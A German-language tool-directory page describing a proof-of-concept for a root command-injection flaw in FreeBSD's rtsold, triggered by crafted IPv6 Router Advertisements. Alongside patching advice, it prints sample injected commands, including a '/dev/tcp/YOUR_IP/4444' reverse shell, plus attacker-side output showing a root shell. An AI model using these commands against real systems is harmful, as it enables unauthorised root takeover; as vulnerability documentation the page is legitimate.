Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-14558 — CVE-2025-14558 | Kitploit
Tools/GitHubGitHub/rockmelodies/blackash-cve-2025-14558
Payload-GenerierungSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsCommand and Control
GitHubrockmelodies/blackash-cve-2025-14558

Blackash-CVE-2025-14558

CVE-2025-14558

Repository anzeigen
5vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-14558 : Kritische Remotecodeausführung in FreeBSD (IPv6)

G8195ymXcAAjXC2

🧠 Übersicht

CVE-2025-14558 ist eine kritische Schwachstelle zur Remotecodeausführung (RCE), die FreeBSD-Systeme betrifft, die IPv6-Router-Solicitation-Dienste verwenden. Ein Fehler in der Handhabung von nicht vertrauenswürdigen Netzwerkeingaben ermöglicht es Angreifern, beliebige Shell-Befehle auszuführen.


📊 Schweregrad

  • CVSS v3 Wert: 9.8 / 10 🔥
  • Risikostufe: Kritisch
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine

🎯 Betroffene Komponenten

  • rtsol(8)
  • rtsold(8)
  • FreeBSD-Systeme, die IPv6 Stateless Address Autoconfiguration (SLAAC) verwenden

⚙️ Technische Details

  • Bösartige IPv6 Router Advertisement (RA)-Pakete können eine manipulierte Domain Search List Option enthalten
  • Die Eingabe wird unsicher an resolvconf(8) übergeben
  • Unsachgemäße Shell-Zitierung ermöglicht Befehlseinschleusung
  • Führt zur beliebigen Befehlsausführung als root

🕸️ Angriffsvektor

  • 🌐 Netzwerkbasiert
  • 📍 Der Angreifer muss sich im gleichen lokalen Netzwerksegment befinden
  • Keine Authentifizierung oder Anmeldedaten erforderlich

💥 Auswirkung

Bei erfolgreicher Ausnutzung kann ein Angreifer:

  • Das System vollständig kompromittieren
  • Beliebige Befehle ausführen
  • Systemkonfiguration ändern
  • Persistenz oder laterale Bewegung einrichten

🧪 Exploit-Verfügbarkeit

  • ✅ Öffentlicher Proof-of-Concept (PoC) vorhanden
  • Demonstriert Befehlsausführung über manipulierte IPv6-RA-Pakete

🛡️ Abhilfe & Verteidigung

Dringend empfohlene Maßnahmen:

  • 🔧 Offizielle FreeBSD-Sicherheitspatches anwenden
  • 🚫 rtsol / rtsold deaktivieren, wenn IPv6-RA nicht erforderlich ist
  • 🔒 Nicht vertrauenswürdige IPv6 Router Advertisements filtern oder blockieren
  • 🧱 Netzwerksegmentierung verwenden, um die lokale Angreiferpräsenz einzuschränken

📝 Wichtigste Erkenntnis

Jedes FreeBSD-System, das IPv6 Router Advertisements in einem nicht vertrauenswürdigen Netzwerk abhört, ist einem hohen Risiko ausgesetzt. Patchen Sie sofort oder deaktivieren Sie die betroffenen Dienste.


Wenn das PoC-Skript für CVE-2025-14558 erfolgreich auf einem anfälligen FreeBSD-System funktioniert (ungepatcht, mit laufendem rtsold und Verarbeitung von IPv6-RA-Nachrichten):

Auf dem Ziel (anfälliges FreeBSD-System):

  • Der injizierte Befehl wird sofort als root ausgeführt (da rtsold als root läuft und /sbin/resolvconf mit der schädlichen Domain aufruft).
  • Standardmäßig erscheint keine sichtbare Ausgabe in der Konsole oder in den Protokollen (der Befehl läuft still im Hintergrund).
  • Beispiele für das, was passiert:
    • Bei einfachem Test wie --command "id > /tmp/pwned":

      • Eine Datei /tmp/pwned wird erstellt, die eine Ausgabe wie die folgende enthält:

        uid=0(root) gid=0(wheel) groups=0(wheel)
        
    • Für --command "touch /tmp/exploit_success":

      • Eine leere Datei /tmp/exploit_success erscheint.
    • Für eine Reverse Shell wie --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":

      • Keine sofort sichtbare Änderung auf dem Ziel, aber es wird versucht, eine Verbindung zu Ihrem Listener herzustellen.

Überprüfen Sie auf dem Ziel mit Befehlen wie:

ls -l /tmp/pwned
cat /tmp/pwned

Auf der Angreiferseite (Ausführen des Skripts):

  • Das Skript gibt Folgendes aus:

    [+] Sending malicious RA on eth0
    [+] Injected command: id > /tmp/pwned
    [+] Target must run vulnerable rtsold and process the RA
    [+] Done. Check target for execution (e.g. /tmp/pwned)
    
    
  • Für Reverse Shell: Bei Erfolg erhält Ihr nc -lvnp 4444 eine Verbindung und eine Root-Shell:

    listening on [any] 4444 ...
    connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
    bash: cannot set terminal process groups: No job control in this shell
    bash: no job control in this shell
    root@vulnerable-host:~ #
    

    (Sie haben jetzt eine Root-Shell – geben Sie Befehle wie id, whoami usw. ein.)

Falls es nicht funktioniert:

  • Keine Datei erstellt/keine Verbindung → Gründe: Ziel gepatcht, rtsold läuft nicht, nicht im selben L2-Netzwerk, Firewall blockiert RA oder IPv6 deaktiviert.

Dies ist nur in einer kontrollierten Laborumgebung auf einem anfälligen (vor dem Patch vom 16. Dezember 2025) FreeBSD-System beobachtbar. Es gibt keine öffentlichen Berichte über Ausnutzung in der Praxis bis zum 23. Dezember 2025. Patchen Sie sofort in der Produktion.


⚠️ Haftungsausschluss: Diese Informationen dienen ausschließlich zu Informationszwecken und stellen keine Sicherheits-, Rechts- oder Betriebsberatung dar. Überprüfen und befolgen Sie stets die offiziellen Herstellerhinweise, Patches und Anleitungen, bevor Sie Abhilfemaßnahmen ergreifen.

Tool herunterladen